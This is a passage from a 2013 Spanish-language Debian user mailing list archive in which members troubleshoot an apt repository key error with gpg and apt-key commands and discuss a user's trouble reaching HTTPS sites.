with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAH45FxfUDu2r7jiNTvNcvjEeDsUyp=fv1eupp2bjf6lkrv-...@mail.gmail.com



Re: Error rpositorio en de Debian Squeeze

2013-03-19 Por tema Edwin Carrillo
Aca lo puedes entender quizás mejor.

http://www.esdebian.org/wiki/llaves-repositorios-secure-apt

Saludos

El día 19 de marzo de 2013 21:14, Miguel Matos
unefistano...@gmail.com escribió:
 El día 19 de marzo de 2013 21:10, Ricardo w...@guzman.com.ar escribió:
 Hola lista

 les molesto con una consulta, un día para el otro me tiro error al
 actualizar repositorio alguien ah tenido este inconveniente?

 aqui les dejo el error que tira. http://guzman.com.ar/imagenes/errorrepo.png

 cualquier comentario sera bien agradecidos.

 Saludos

 Ricardo


 --
 To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
 with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
 Archive: 
 http://lists.debian.org/cah45fxfudu2r7jintvncvjeedsuypfv1eupp2bjf6lkrv-...@mail.gmail.com


 Solo para saber, ¿qué dice tu /etc/apt/sources.list?
 Prueba primero agregar estas líneas en usuario root:
 gpg --keyserver hkp://subkeys.pgp.net --recv-keys B5D0C804ADB11277
 gpg --export --armor B5D0C804ADB11277 | sudo apt-key add -

 Luego apt-get upgrade  apt-get update

 Si eso no sirve, probar esta otra línea:
 gpg --keyserver wwwkeys.eu.pgp.net --recv-keys A70DAF536070D3A1
 gpg --keyserver wwwkeys.eu.pgp.net --recv-keys B5D0C804ADB11277
 gpg --armor --export A70DAF536070D3A1 | apt-key add -
 gpg --armor --export B5D0C804ADB11277 | apt-key add -

 Y de nuevo apt-get upgrade  apt-get update
 --
 Buen uso de las listas (como se ven en Debian):
 http://wiki.debian.org/es/NormasLista
 Ayuda para hacer preguntas inteligentes: http://is.gd/NJIwRz


 --
 To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
 with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
 Archive: 
 http://lists.debian.org/calevjmr+xyjt3xdyi-ujhchvmcfmla7xk02tuxav2w20gbs...@mail.gmail.com




-- 
Gracias
Edwin CarrilloLinux user ID 503823
Debian user, debiancalam
ca...@esdebian.org
311 279 4973


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAD+_2Pq6Bvfp83xf71fC-xTrCWvXC+5t+64C=v8c-hxfmnr...@mail.gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema consultores
On Tue, Mar 19, 2013 at 10:02:25AM -0300, Felix Perez wrote:
 El 19/03/13, Felix Perez felix.listadeb...@gmail.com escribio  El 
 18/03/13, Francisco Antonio francisc@linuxmail.org escribió:
  El 18/03/13 16:25, Felix Perez escribió:
  2013/3/18, Fabián Bonettimama21mama2...@yahoo.com.ar:
  On Mon, 18 Mar 2013 16:43:33 -0300
  Felix Perezfelix.listadeb...@gmail.com  wrote:
 
  Comprueba la fecha si la tienes correcta.
  Gracias Fabián, la fecha esta correcta aunque con todo los problemas
  que hemos tenido con el retraso en el cambio de hora (Chile) no
  descarto que algo tenga que ver.
  el date me devuelve:
  lun mar 18 17:20:39 ART 2013
 
 
 Mi sources.list solo tiene estas líneas.
 
 deb http://ftp.us.debian.org/debian/ testing main contrib non-free
 deb-src http://ftp.us.debian.org/debian/ testing main contrib non-free
 
 La línea que me intriga es esta:
 Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
 Ign http://ftp.us.debian.org testing InRelease
 
 ¿Alguien ha tenido problemas con los repositorios en estos días?
 
 Gracias a todos.

Hola Felix
Yo estoy en transito, se supone que ese es un error de los servidores; si te 
parece, yo puedo colgar una web https, para que te conectes y enviarte el log, 
para que depures el problema.

Por otro lado, hay vulnerabilidades en ssl y otros, lo del sources.list no lo 
puedo confirmar ahora mismo; hasta dentro de 6 horas.
Si queres, proba con https://livestream/algo_de_tu_agrado ellos han actualizado 
recientemente y me contas.

hasta mas tarde.



-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20130320032259.ga18...@consultor.dyndns.org